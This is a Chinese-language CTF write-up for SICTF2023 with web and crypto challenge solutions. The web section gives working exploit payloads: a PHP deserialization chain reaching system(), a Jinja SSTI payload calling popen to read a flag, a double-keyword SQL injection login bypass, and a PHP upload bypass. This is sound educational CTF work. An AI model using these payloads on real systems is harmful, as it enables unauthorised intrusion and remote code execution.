SICTF2023 WP

news2024/11/15 12:38:46

前言

新年前的最后一场比赛,感谢shenghuo2师傅提供的misc和密码的wp,把misc和密码ak了,太强了

web

兔年大吉

源码

<?php
highlight_file(__FILE__);
error_reporting(0);

class Happy{
    private $cmd;
    private $content;

    public function __construct($cmd, $content)
    {
        $this->cmd = $cmd;
        $this->content = $content;
    }

    public function __call($name, $arguments)
    {
        call_user_func($this->cmd, $this->content);
    }

    public function __wakeup()
    {
        die("Wishes can be fulfilled");
    }
}

class Nevv{
    private $happiness;

    public function __invoke()
    {
        return $this->happiness->check();
    }

}

class Rabbit{
    private $aspiration;
    public function __set($name,$val){
        return $this->aspiration->family;
    }
}

class Year{
    public $key;
    public $rabbit;

    public function __construct($key)
    {
        $this->key = $key;
    }

    public function firecrackers()
    {
        return $this->rabbit->wish = "allkill QAQ";
    }

    public function __get($name)
    {
        $name = $this->rabbit;
        $name();
    }

    public function __destruct()
    {
        if ($this->key == "happy new year") {
            $this->firecrackers();
        }else{
            print("Welcome 2023!!!!!");
        }
    }
}

if (isset($_GET['pop'])) {
    $a = unserialize($_GET['pop']);
}else {
    echo "过新年啊~过个吉祥年~";
}

我们要利用的是__call方法的call_user_func函数,进入的话只有__wakeup()__destruct(),如果我们执行wakeup的话就会执行die()退出了,所以从__destruct()进入,进入if语句,满足key == "happy new year"执行firecrackers(),这个方法中会给不存在的属性wish赋值,可以触发Rabbit中的__set,之后会return一个不存在的family属性,触发Year中的__get,之后会以调用方法的方式调用对象name,会触发Nevv中的invoke,之后会调用不存的方法check()触发__call,之后给cmd赋值就可以rce了

链子:__destruct()–>__set()–>__get()–>invoke()–>__call()

poc

<?php
highlight_file(__FILE__);
error_reporting(0);

class Happy{
    private $cmd;
    private $content;

    public function __construct($cmd, $content)
    {
        $this->cmd = $cmd;
        $this->content = $content;
    }

    public function __call($name, $arguments)
    {
        echo "到达call" ;
        call_user_func($this->cmd, $this->content);
    }

    public function __wakeup()
    {
        die("Wishes can be fulfilled");
    }
}

class Nevv{
    public $happiness;

    public function __invoke()
    {
        echo "到达invoke" ;
        return $this->happiness->check();
    }

}

class Rabbit{
    public $aspiration;
    public function __set($name,$val){
        echo "到达set";
        return $this->aspiration->family;
    }
}

class Year{
    public $key;
    public $rabbit;

    public function __construct($key)
    {
        $this->key = $key;
    }

    public function firecrackers()
    {
        return $this->rabbit->wish = "allkill QAQ";
    }

    public function __get($name)
    {
        $name = $this->rabbit;
        echo "到达get";
        $name();
    }

    public function __destruct()
    {
        if ($this->key == "happy new year") {
            $this->firecrackers();
        }else{
            print("Welcome 2023!!!!!");
        }
    }
}

$a = new Year('happy new year');
$a -> rabbit = new Rabbit();
$a -> rabbit -> aspiration = new Year('1');
$a -> rabbit -> aspiration -> rabbit = new Nevv();
$a -> rabbit -> aspiration -> rabbit -> happiness =new Happy('system','ls');
echo urlencode(serialize($a));


//O%3A4%3A%22Year%22%3A2%3A%7Bs%3A3%3A%22key%22%3Bs%3A14%3A%22happy+new+year%22%3Bs%3A6%3A%22rabbit%22%3BO%3A6%3A%22Rabbit%22%3A1%3A%7Bs%3A10%3A%22aspiration%22%3BO%3A4%3A%22Year%22%3A2%3A%7Bs%3A3%3A%22key%22%3Bs%3A1%3A%221%22%3Bs%3A6%3A%22rabbit%22%3BO%3A4%3A%22Nevv%22%3A1%3A%7Bs%3A9%3A%22happiness%22%3BO%3A5%3A%22Happy%22%3A2%3A%7Bs%3A10%3A%22%00Happy%00cmd%22%3Bs%3A6%3A%22system%22%3Bs%3A14%3A%22%00Happy%00content%22%3Bs%3A2%3A%22ls%22%3B%7D%7D%7D%7D%7D

注意要把Year中的key赋值为happy new year,之后因为有私有方法private所以要url编码

ezbypass

源码

<?php
error_reporting(0);
highlight_file(__FILE__);

if (isset($_POST['code'])) {
    $code = $_POST['code'];
    if (strlen($code) <= 105){
        if (is_string($code)) {
            if (!preg_match("/[a-zA-Z0-9@#%^&*:{}\-<\?>\"|`~\\\\]/",$code)){
                eval($code);
            } else {
                echo "Hacked!";
            }
        } else {
            echo "You need to pass in a string";
        }
    } else {
            echo "long?";
    }
}

这题和ctfshow举办的rce大挑战基本一模一样

直接看我的这个博客就可

https://blog.csdn.net/qq_63928796/article/details/127963079?spm=1001.2014.3001.5502

SSTI

f12看到参数是SI,字典fuzz一下

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-MbSw1oU4-1674185778219)(SICTF2023 WP (1)].assets/image-20230120105850610.png)

242是被过滤掉的,经过测试

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qr67NuUe-1674185778220)(SICTF2023 WP (1)].assets/image-20230120105827700.png)

可以通过拼接来绕过过滤,构造payload就可以

?SI={%print(""['__cl''ass__']['__bas''es__'][0]['__subcla''sses__']()[132]['__in''it__']['__glo''bals__']['po''pen']('cat ../ga1f').read())%}

ezphp

题目是一个登录框,有sql注入,过滤了空格,select,用双写绕过

pass=1&user=-1'/**/ununionion/**/seselectlect/**/1'

成功登录admin页面

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-EU7wy75b-1674185778221)(SICTF2023 WP (1)].assets/image-20230120110715835.png)

随便输一点可以看到源码

<?php
ini_set('open_basedir',".");
error_reporting(E_ALL^E_NOTICE^E_WARNING);
session_start();
if($_COOKIE['admin']!=md5('adminyyds')){
    header('Location:/index.php');
    exit();
}
echo('<h1>WelCome!ADMin!!!</h1>');
echo('this is a site test pages for admin! ');
if(isset($_POST['url'])){
    echo file_get_contents($_POST['url']);
    show_source(__FILE__);
}
else{
    echo('<form action="/admin.php" method="POST">
    url:<input value="" name="url" type="text">
    </form>
    ');
}
//x9sd.php
?>

提示x9sd.php,去读取x9sd.php

post:url=x9sd.php

查看源码就可以看到x9sd.php的源码

class a {
    protected $cmd;
    function __destruct()
    {       echo $this->cmd;
	    @eval($this->cmd);
        
    }
}

if(isset($_GET['username']) && isset($_GET['unserx'])){
	$var = base64_decode($_GET['unserx']);
   	    
    if($_GET['username'] === "admin"){
        echo "nonono?";
    }
    $username = urldecode($_GET['username']);
    if($username === "admin"){
        unserialize($var);
    }
    unserialize($var);
    echo("success");
}else{
    echo "I need some ???";
}

意思就是通过反序列化直接触发__destruct(),之后调用eval函数,进行rce,还要绕过两个简单的if语句。

poc

<?php
error_reporting(0);
highlight_file(__FILE__);
class a {
    public $cmd = "system('ls')";
    function __destruct()
    {       echo $this->cmd;
        @eval($this->cmd);

    }
}
$a = new a();
echo base64_encode(serialize($a));

//TzoxOiJhIjoxOntzOjM6ImNtZCI7czoxMjoic3lzdGVtKCdscycpIjt9

再吧admin经过两次url编码后传入username

username=%25%36%31%25%36%34%25%36%64%25%36%39%25%36%65&unserx=TzoxOiJhIjoxOntzOjM6ImNtZCI7czoxMjoic3lzdGVtKCdscycpIjt9

ezupload

文件上传,给了源码

<?php
    @error_reporting(0);
    date_default_timezone_set('America/Los_Angeles');
    highlight_file(__FILE__);
    if (isset($_POST['submit'])){
        $file_name = trim($_FILES['upload_file']['name']);
        $black = array(".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext);

        if (!in_array($file_ext, $black)){
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = 'upload'.'/'.date("His").rand(114,514).$file_ext;

            if (move_uploaded_file($temp_file, $img_path)) {
                    $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        }else {
            $msg = '你传啥玩意??';
        }
    }
    if($is_upload){
        echo '呀,(传)进去了欸~';
    }
?>

主要是这一部分

if (!in_array($file_ext, $black)){
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = 'upload'.'/'.date("His").rand(114,514).$file_ext;

他把传入的文件放到了upload下的一个文件,而文件名是由date("His")传入的时间rand(114,514)114到514的随机数再加上文件的后缀组成的,而这个时间开头被定义成了美国时间

date_default_timezone_set('America/Los_Angeles');

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-3W7sXT23-1674185778222)(SICTF2023 WP (1)].assets/image-20230120113046929.png)

这就是时间

再看这一串过滤

$black = array(".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess",".ini");

其实并没有过滤php,所以直接上传php文件即可,之后再记住上传的美国时间,再bp中爆破rand(114,514)即可

CRYPTO

Ascii

import base64
flag = 'a$HVZDZQ@TJUMGLVHZIYUF1U0NNYDURWWDNM6FFYP1OA[TRPHWJZ7R>>>>$'
flag_ = ''
for i in flag:
    flag_ += chr(ord(i)^3)

print(base64.b64decode(base64.b32decode(flag_[2:-1]).decode()).decode())

hashgame

MD5再MD5

为了只爆一次,写了个ditc

from hashlib import md5

flag_md5 = '''999a215b1f8372bb0f1c84c467a1506b
02b0b94ee1fa195ae7959560893f7e3c
297e7ca127d2eef674c119331fe30dff
65c162f7c43612ba1bdf4d0f2912bbc0
ed8a4ab0c0967b14e3bf6b145e153ec9
d24412e1ab190533176a653cef11b185
815e6212def15fe76ed27cec7a393d59
38026ed22fc1a91d92b5d2ef93540f20
cd7fd1517e323f26c6f1b0b6b96e3b3d
a94837b18f8f43f29448b40a6e7386ba
dc0ae7e1387be9b795f5d6299e383759
815e6212def15fe76ed27cec7a393d59
38026ed22fc1a91d92b5d2ef93540f20
dc0ae7e1387be9b795f5d6299e383759
a3655d5c04849a174d341b13d5cf5468
28c8edde3d61a0411511d3b1866f0636
011ecee7d295c066ae68d4396215c3d0
d7afde3e7059cd0a0fe09eec4b0008cd
39abe4bca904bca5a11121955a2996bf
a3655d5c04849a174d341b13d5cf5468
011ecee7d295c066ae68d4396215c3d0
28c8edde3d61a0411511d3b1866f0636
38026ed22fc1a91d92b5d2ef93540f20
dc0ae7e1387be9b795f5d6299e383759
a3655d5c04849a174d341b13d5cf5468
4c0d13d3ad6cc317017872e51d01b238
83be264eb452fcf0a1c322f2c7cbf987
4e44f1ac85cd60e3caa56bfd4afb675e
815e6212def15fe76ed27cec7a393d59
a3655d5c04849a174d341b13d5cf5468
28c8edde3d61a0411511d3b1866f0636
4e44f1ac85cd60e3caa56bfd4afb675e
ed108f6919ebadc8e809f8b86ef40b05
a94837b18f8f43f29448b40a6e7386ba
dcfcd07e645d245babe887e5e2daa016
665f644e43731ff9db3d341da5c827e1
83be264eb452fcf0a1c322f2c7cbf987
39abe4bca904bca5a11121955a2996bf
39abe4bca904bca5a11121955a2996bf
4c0d13d3ad6cc317017872e51d01b238
dc0ae7e1387be9b795f5d6299e383759
011ecee7d295c066ae68d4396215c3d0
5eccf232f5ebb3e780543372692fff18'''.split('\n')


import string
md5_md5 = {}
for i in string.printable:
    md5_md5.update({md5(str(md5(i.encode("utf-8")).hexdigest()).encode("utf-8")).hexdigest() : i})

flag =""
for i in flag_md5:
    flag+=md5_md5.get(i)

print(flag)

# SICTF{13578a78-1bd1-483e-8c01-4d501c8b52bb}

baby_rsa

N是234个素数的积

factordb分解一下 处理数据

import libnum
c = 44457399775772165283580795763046604956432217865936749114390645714446263790235445725770165521476841968764175721036280702731933849090719866149354613431301887740671003826556620460836983488011711209908075106260857650574672356032244606425941095128801765463716482316101398637519304864271794460829068714740938719022156283319142938782439784724450045931039355442034325311037568791297455084676548879770834712506552233840348850684727096270392080049993135041218143811167688449496243036317450681348089315258831745988434134987055263393540923865029931594717328162951158311497514418799360413513590684301435386737514918075848373373755748782672860711406169316940293554209702288482064854840802876490202123903888235028119047988176327629542924415737212649237787748145773301112682790682933658516724691338727523894513267588035437093188599375494920656327919129240066252636130803666175859640361767805549884909317548802917210333235914904622641997249853362378711924024129399688535136879208010081166848163897114124726692078532337827810846421365846926064892472698603597461932481745017020417072013702099809833423003201003030492
n = 157077292656328898849823499976497003976795705913326943955927601882559735301000546878663484930436631929909115065166613744548816622146802007640124796249330573411377703969505934904150600987843325674764620305047603408490558134670867673308099650843329640744997672015466571290660161290811275435569339606335117906571999000341133024698424364682800683662193063661214736762852739324479859236963365531207752799197178993887860855078852702337761399225640575281412171035871278933493943575572155382899938265639764715616686123949482372238288859715465115400317136714757882965887595246507450491169518000205087415380208167764110920711042584766805992237919576823121108078407699912757901788925718859790257450499775129521327827653298451904392241906547672843110356658889638496906522290674659574024024440113632175010053065452660076447040937842478007881589334096496073556056726805396937630799201696246079227214272205462258357482722478243481697053301054600954126539848778226175296162997813416634702496577009409960503948474494741296663849482119365434792563324547643352816519125305335959420429699475765642610737903235960423173
e = 0x10001

process = ['32771','33023','33071','33149','33343','33521','33863','33911','34123','34159','34231','34421','34499','34589','35089','35381','35831','35879','35969','36131','36523','36677','36871','37039','37159','37493','37691^2','37781','37951^2','37967','38219^2','38639','38821','38917^2','39019^2','39157','39343','39371','39703','39779','40087^2','40459','40471','40693','40867','41039','41161','41257','41263','41281','41387','41399','41443','41603','41771','41809','41863','41887','41941','42359','42373','42839','42899','43151','43207','43313','43391^2','43573','43613','43987','44087','44111','44207','44249','44281','44417','44491','44563','45077','45247','45281','45377','45943','45959','46147','46219','46439','46559','46853','47111','47681','47777','47857','47911','48259','48437','48479','48497','48593','48947','49103','49177','49193','49199','49363','49663','50047','50147','50261','50359','50383','50539','50833','51001','51109^2','51437','51593','51749','51787','52201','52379','52453','52769','52879','52937^2','53147','53717','53731','53917','53987','53993','54217','54311','54347','54377','54437','54469','54833','55049^2','55147^2','55249','55259','55291^2','55381','55457','55541','55661','55793','55967','56131','56149','56359','56501','56843','57037','57047','57131','57139','57413^2','57487','57571','57637^2','57803','57853','58057','58099','58147','58427','58537','58543','58679','58963','58991','59159','59333','59377','59417^2','59539','59611','59723','59743','59833','59879','59929','60029','60413','60427','60509','60679','61211','61379','61403','61781','61861','61991','62039','62297','62467','62581','62617','62683','63073','63149','63277','63331','63439','63659','63799^2','63839','63929','64217^2','64433','64679','64781','65239','65293','65497']

n_primes = []
for a in process:
    if len(a)==5:
        n_primes.append(int(a)-1)
    else:
        n_primes.append(int(a[:5])-1)
        n_primes.append(int(a[:5]))

phi_n = 1
for i in n_primes:
    phi_n *= i


d = libnum.invmod(e,phi_n)

m = pow(c,d,n)
print(libnum.n2s(m))
# SICTF{13578a78-1bd1-483e-8c01-4d501c8b52bb}

PolyRSA

可以知道

p = k**5 + 9*k**4 - 20*k**3 + 17*k**5 - 144*k + 47527
q = k**6 - 8*k**3 + 30*k**3 - 149*k**2 - 14*k + 39293
n = p * q

算一下可以知道

n == 18*k^11 + 9*k^10 - 20*k^9 + 396*k^8 - 2628*k^7 + 45494*k^6 + 710128*k^5 + 350749*k^4 + 281190*k^3 - 7079507*k^2 - 6323570*k + 1867478411

由于 k = getRandomNBitInteger(64)

所以 k = libnum.nroot(n//18,11)

import libnum

n = 2931835714514227696649197851452018066969814603905505893064829694548691616628661422451386639398824072768907608195113790730392677411502544741840786734616614308622423513064577929715025601090611378413475093510051291
c = 1162375069210804266034094584942794481470301602122091344590668656120128936761168164673823514232328715217241524062023457713973727518007443604233760475552174214966591823835585191443465256735930086309706593996639864

k = libnum.nroot(n//18,11)
e = 0x10001
p = k**5 + 9*k**4 - 20*k**3 + 17*k**5 - 144*k + 47527
q = k**6 - 8*k**3 + 30*k**3 - 149*k**2 - 14*k + 39293
n = p*q
phi_n = (p-1)*(q-1)
d = libnum.invmod(e,phi_n)
m = pow(c, d ,n)
print(libnum.n2s(m))

RRRSSSAAA

hint是dp泄露,先解hint

import libnum
import gmpy2

e= 65537
n= 154243858720978602820118866455277758287334223654318945323956633685668127012462551649034724900534326698546179107853501584676890290935304784613676008667655919749627682648852472398117930471389759979432279103098572267738634433626627146280660185675121614094399255782089060202532182667463993275434746386786808729553
dp= 414447829724187823397808703878958757693775250832414113550357728233230359464880433113636330432984183165483109337095394192757735932571515450285102727598243
c= 107353143319003715532284973064969905174389167949274067058206046773012002421251301189097709121034091973243342582216724329271495555062882075119176838856174054763892910473175610614629226628025470613930226188506099489500606701109022668507012376482339056160636468427364776216626364765166621843217027512464383836160

for i in range(1,65535):
    p=(dp*e-1)//i+1
    if n%p==0:
        q=n//p
        break
print(p)
print(q)
phi_n= (p-1)*(q-1)
d=gmpy2.invert(e,phi_n)
m=pow(c,d,n)
print(m)
hint=libnum.n2s(int(m)).decode()
print(hint)

得到 Alpha == 8

p = getPrime(512)
q = gen_num(p*alpha)
r = gen_num(q*alpha*2)
s = gen_num(r*alpha*4)
n = p**alpha * q**(alpha*2) * r**(alpha*4) * s**2

gen_num函数相当于nextPrime函数,所以把n中的qrs近似替换为p来表示

n = p**8 * (p*8)**(16) * ((p*8)*16)**(32) * (((p*8)*16)*32)**2

n=127314748520905380391777855525586135065716774604121015664758778084648831235208544136462336*p^58

所以p近似等于 libnum.nroot((n0//root),58)

然后求一下上一个最近的素数

def prePrime(x):
    while True:
        x-=1
        if isPrime(x):
            break
    return x
p = prePrime(libnum.nroot((n0//root),58))

然后按照原方法推算,发现n正确

import gmpy2
import libnum
from Crypto.Util.number import *

def gen_num(x):
    while True:
        x+=1
        if isPrime(x):
            break
    return x

def prePrime(x):
    while True:
        x-=1
        if isPrime(x):
            break
    return x

n0 = 510598540378970007468346322989879190780475356832709189528874695730531468123747091318830966440138615736420891392158097533731041150162690662471483619765171875053776526546923686545162088172326434280369545887080098691661618888498451216122577703462656147845476260802989936275927468143618457014875124540773380472942489037761179303561650189545290190421786318533073909424735517884608967725919128200358535113829753453601297612782921831305721998858231417374167746154206561475003022801732102170674160043866579234096945753255309604584663823273990392197858273029361669185072049422597132579136784027822968387907216366150999438414498332890674564920800382005582891491049365978733797356415518435343495821039314228388769356638637099572998812062355774848959446125701462950655806332002764535951282449862140062574418031213788534096501985200284615865248974807525604893147298611402252296159828500266098282909607218395957805357667923653409828275804406466185333491486073920384298557332939701611488655278812282652143513835104674009767479927241052662403578967182673338296967573503287747778401579267126898937724971226916836862238412923209155792382534204896050548824028658237640251964366961727999178646613907934616655737902329568420682808750546571786374023614255135110482419627491157502417864563832543812083026753673687664854910877686333766643694031564516722983669199704788291656757271915091399977189663329054202997146978631991467923388119989473941572476162990901960011968892272676827771256008656450296183884491251752111424531449198118292179798490440493223653950102915889401116251591885909790869073018774674246846164536910633015902964911907187085243240032540938841961345835517368130042501382327926289017383981908729734129193302049155793436988510517701765733605569135643208447952662352778482137713239592896997102366230279153456455232519301534222340901671138239539845240151878610363390683459663471954623868659324304077587611084188341121303918876492043578883059738615210439439368338460631574255417822627815523601923537626576677004085017875860928802762176477815284840936951142176532768517728636562256240668409525184886142801802825451465440993457022771077957094228957592122319682216294509338262739872163482972508991702525289361105971574659126127296233247905505496525683817711366704746617027744889413904684867577081667137187623825349410229389484199608739864221035985277681307389939848405790294473878622092200837753161101695539947514614727699952200114544362051873938505591469240465379091377837297561323297393518152524513948294475770774872596601345526469590486037386767964812631618224527233850818909346007449756779707319609915127618828551910681421647307180399632857248867655836894968134457622987954781685664833951774981383914013420724637676787907498490619865488706542422141338754933476190313653530739822029700217857534243473680585150263523947891501341441371965435851479670882202992955935279933652356336270251591324623898094984119190752775236005057405257945038031382867511822173122001309505728526596893926445291712035117553637589190292816001770554129840326832888707541999454791653742647879694585329112697382151447923691770809327807665376014114552626285289291808032845544905356380497227622738746307685611140483875177839511922977657045680353723672792411661489242162646272105649970359134277499907207906149573299990033858943215801954126448693460102775418225293255402758159431943811872373682053160944887775375465971432320964554947377318554518275854303099420999992690990916801757184853847474379621177976926681977371922191722085164910430032177320954341986984523594583172470609743970245810969858512632597943721628165724329447516823159387734220282510185959768239630017162115072758419177056571781075148374822721899683720488356041096248563880547752710289151512607087038310649235610688255059182467964379544134070766646863815775576049106337955345150055151813028534690066771104188418296440067303355417210829440978858599306487361626723932883675404705319649877631289465547597225908934420304867048341698308940436377375588905463549199568800788130324653074398891097223958392703515180958466771395566567923630440881986781120062769327993137151783189811570714391264155060840731029466593405853721833971303821804104382800673631786729744779165371433211267361024896576031556979771007693215198547296582235167582106419779580693225211695215406540025468141235241168387527901851774993867055740692835931115312659500713701652905802357951993290979099170159167009106534001226859533836082801229997337966972579186548771169099646656172882424089451273021293821026173210665095782802709874946641962115525841325300318524665386511421662860490620819561338110623774842340380068922415609137358448899126553279894950604871889208579886778999174405582160576479554324208876082033912031737086248121899303730781498156597249803927142235444644481388064486155431912003641095674949903404176810866307571531389637794147871012904134653569388493652441432759092336752228939764110397029831387803943394811558386122839568158928461007578259968765727092577006588264867960486472014493774664081407186721351852883527145790575242285664659303948842228766554243966691396492391152581830022133814454196259968655735361775914705332258892954614272244452518449260489348504449204461418971768011384340273291232094176572232837038670467853897665877851434992557429017504229337778470080893449423405491607587635438331476572996201482633587271479001915768182336813417460145272910780420062773057289352127058606048428315185624554551172152106354445240590380140756355226376829443068190672329776832112173322011137862590548721676059398379694994522794474774534579546109677615257696703950497332824299576069196330271666459758430542051969093680846765661685489556479825015505460585577388300005030240514448617715276600874290664416888184557142542207029827016362686924883704397874129412267949416733492080843315519912943048041880665442664534980370689081266908497051077237188221752059058912835617635691061804481035908317765279937217591432632832678806430381325340000898958680468694182993189208039459712391492410123386884340504648296815916980264240229859574883155040793388439699245314010536014311134726579595932201351264754211113984594974123575279085420654342347792446273359397655783349850267895960713020361459104930811498666622216299579774939159380045958811891996366190154624989040001455252320159516822116133341010157165599727635333348456688307169980804760876207246783116588952529877373514768545007418968307885769960168050996962066803264260375707466369627458024513973771207018864983698407016663019106354023164759250846073414341438963394719456500998324900154652118420207057668806120330181700845296117532235012372135050553397046174401449323031309344766628888675704109715329046692002106076405553528413866402862565543443907259825033515101841485790388106868972724754988229771779715569516295419556055234476868558577442887306482605945053829666543946452255290321024138948999088611233226734197091325915223296133751626031378197131875533631358612215053149934608672729194446883476706267066475008836864936670808320239466055935088929279252129128009704233352664523535820092988950793050907265677092793104426094212209504897403359406325045852228354350509453013015487815230129380079713113632363881496974185547766115624580099624722897692297760495094913178120692467666707678647081180656345151015995338390986674404981831649353833607305738823436744297628382797810952028446046016233612873716789383675779820186248250486000672269630344269347652027789034023080859790238772676504723029078903218723114249502157501775936110552413022658586833869562215506206204712447588632398550497708640229614956652263449460598992811393334042395804931240940416629178335447861485028284981615219874331354750385150254017244750993573994159458909546341067039268159319391512934162794663414200907868505060542602841564239761181077333990423542820064315891665379550720216448942932714180923613869070005330476506812100063599659432570925437054287120906048730323556681557905787470647037629769660028387819741611799183349496549168370221978146678987457271259655273299546276899538032070218474555442304430064164467753804089753466882786069297036926063093020795423414152340563079346797084488827259011515774643776620378827875819192074121522712821147817374988804339999134520633699074448564057555026364304855373068414955699295158212425760345481057281658337956841137897162198027254556350868502178340964817530029135654659162400076087528650997151875596189190736466304722028587441680622878918057024286243448077104494316372739218635221411755498456912672491099154558604384574583302548226057069534004474532514444674565766058970748694657151540644416463532338966570743112669782840065402131461088637463019996192189423665651801811614499041923273110971446683450048861113332787126098622974613883291506736280588039145040361795192519576202306796277888696719887642051327259799873478040156450250036778305950744573270786882726162630115640020293415918210448873867037875790399234972055537649774407094382744621251926131880807765203843946682834221238903263352845265134368550124026502981782369374484091775137498831749984649699756860976525160646445060537001
c = 2531158826968617795544873459382924122557717998816471394185297761103165748335435821170312723425685754304593149059523546269415450028650433532186356690459152658716429727754058801940418375009330303011015596430823315562597921339142657700112773216179353217193003237231148578980083913537858412584394500321778663550078078453618131369772835451092134304931989160942358095112708247915404212408853664235381251636247376324342533649868102473113101371215832092655082602327789828382399225857288407727650695390198437041349338942170124451717727569429058059588332470520442654660036009106297229315947988026824070192958413771405369270417379270374431961932069206109206161520275394313505820463761099423216881808146286391590926110021195867454364700541623522262060621284175358641983644868144565468138995121112460328796239716467234302639110139539344210308625672626603127571066630984045144311082417597696435510923920160972112096181019887945632185522235223506525708287260043860468761726771872558899346408414769503761014563423778852669138635859686736852316406111419524586006203324427627048026773761720661277548633577985130942663878925016690093178475160050819045078580634083929746843262635482326801110839969924987635836386629346989957215883775774862958649233978388845660025913638761677759389478930243175239144733327800081152106209646739750122765156649897077908081118880599237097094240320843249439338789419717672024431563955989561679955135760168859754158570903936619008811737888041492853293708549071333614052392698390018837802159322555013199352827516627221502851043569094458259655754906871531251591905933391694174493730825567195976485916248779265827481232289167916191548009886470910634735729201594988224309556499928363028987684291355841520596773445265794499135026810820222595295206645909316879282568462640527161761336207089714210305413980656649518317233579495730882264811653783056739697123832993914282956316935519409352921107116007868383349191994002287186205998134696100386762054262057891768468786968255026912722629101160706454573938685005484616730774402270883183325251777860779625859829090813927434522134365158361824928730873827901168296078746018918344509563816411673470062449671148722717674082839769629562023279635600513605851782831113983938142406630208611193063599814306303344613185985279795876519917380771554104595610828559695878074283480553322353836635432708773608850059909435810716468942357296479338578819421891891959647886209729247762842636033387431426010813333937594266650860631139180525296627796175810882194615442847761610000432145760487922052374242763332387295369993152198033202624153104947403143814279239462857601612132203629474017698018994085303667937584557701797878307101597082913667622138958584805818954479376057019679762943228267237100029084049211972043335019283364883979473059818862037441686523242665853884190089710816217358073932367532488077849492403898235834953184819709099054102070829511615662438913527365049181160101163690392858601150452643149865201154869315798502945639885118982102077895852780917443315624354403062434191571381066128703765958601876808547067024079094217150684363727144272182360826649036462742933102369819995521845637171626900497976498238392129484286412119612469940203720459850431096939078909200111431982285224250094114135528169372511046050654842626310521349840419751960661583167285393164658375774214549256210125054659399787458607692664124104731751083802404214750877059517571814617571683386778158124529865839217550206948397973633633073112494203675707170908663807528465558978786856502376373466421935394014382018331853464036050628777920846842726837718397350152833374981600385583486356539412244819102957852851165019463262398920863740100811442245168631231964405451494470056643091283534051860169876712819583370418265773056658924789127762710102710663573299813673539807885889938471311859366898477359290470413140290514575457009196690112041120140525643523206329579083316113200224627966316138842199724222690712682985892217470965362769614635547269026219812733897111261075383966167708046377511241188419623018587723406672856471692955160712914173515537952904830020470028551166620520468624475155714768433859130011140607597675998829593787004574303181606799476891530311112525366486536986358680723494535244504502650149584967144769150225348964265765284894910282340776210894316178924413411986644104067084003701561730705682115028545399419902494745777464725361851299567731379203610610049793665414200817338926034541185452038336680083154233924375742103312110316794352091588504369888260969300762959109322581972765324018300345033980285705973687064519760917079983861031630712314692796666991263822758751739628291094635519478127541534349117058339248015359908612537405184430686951007915246176312262266828024919204702478462469277624426587415347311499361901911347416695812684136854575869383278675694629883389103317175253407938736464102183531186150960949412559328594744493999654240277402050753115819876614928299399463860745882021116362330968714980733996000761476687968867646240060689985153902367115203853693443312897335863781290700111209308671394970164696477701392561663795611482591852522996811930660725631272751842907425319393491560986540011840012433480632003399063059545438178037812323263313456540815221641047849758271689191947775573622363658349370969148294879399597477552070933740991057335896063207724556401749510317398225050622492784889097767169873133773794586246930339735229157970635809043735912617198055538703399750717020806386878868578063372749515854291127698138376469803008889490404329834018434281871627809140735655194035801053273835614460064867187014120165626088256055009611125904773023456517301787596939013005574283237561237916706470142126300600447241499883088659012178452581280319848174426334918631013759402396127295952198289280437241280244837507405805995385175172127644864723881875724512813984412623449088706489717617560599147736483877590254904948448564955047585725711521954060693147255800489056450313487049014065662424140174719854071527580494103207457335686046017286834037358369258490287297922111498229805058668571988706087341385062164551912895402225385092982560826327309647694259133336796850979092547838896097433415715599058725966408590337763564597138926155440501449180985611396207232111532932375188085024545085542973369098668746251453979325611123899183040426483394595005754804134755226535191207540606825430158952736837655205775065688859586704801501225535006002343875247706830744595624568318309651226721789114981271968662238124026046677255288978864187606405796017383766402958619673143645657441455997232070540086127159246237987567627725108631287219571602471946884739377889215449834429655413686886873295091016239052199666083351601086826734153974429960305084253065178042594753181647956642616542212325228542707686206755326024035739599146348501177812563534707664133720516216365891595825787918995106843259149228748312994412528796391371373617414372675456343701376095861833447737772759691858868592888442826744942275177530915382116406615715712757893143078978279143246697274308325693084656091638002293543907419420858741349983034872100430604784391609038287942720865394687440441658148249741973746563815823734033082270357366531891766736047129461161022479424754670180104429082538796999492573516522302155029457721131208616907738998536735170709971248369824365887000726117794650869883079208008740014546846645701302364858570783166196899378915154505168100826329302107869313843266841156284290464566135649989158820783121418285248550756939109408077028154683076217207573710819678235464207349189067201484570732096639149146760928062704783483877341613038073507448836427114954342514910127221383398345169091277591409968831007802831786813989558646964824169143439055973802066579053574891166719834147832981817205010359316914407771308185896894527780291163151452477051677398769116284677489282840701026276659840287396527270820151904333993047462174806536013299886191109009721024774418187781155804769156349009311281088098841688085936363169386244129140134486836251795815713481563263315210116479221119987277000421457534255675195475306743605721698910511597489482669130173465875255479633608716315308701375518224790285184783986780721961504442761632651898667476830210956995521838956945876998587445127311713843554666502482635805860055152391680801550503796246835094210670250388311297563475797163653524999896216488670428673234571121036293131218731983600155534820269580628273094550151075665916423113962327795419208789914053728412200907076397907304883747198461868402067437022146329430623942422041290040146055078328359178980173540136747363085468430627327388168889602168291194479372987492118184809838294397046734181139848212165733078139369909679605029080860448172487969809185269716338382685457548720136510667319681157372924728057778150036676333056712200758883380591208700944649973956246342856895224823450650706995359658930972826514519592226816510605645038884026934940958802030001134094032196996583351912693647296992925582354002708303242472450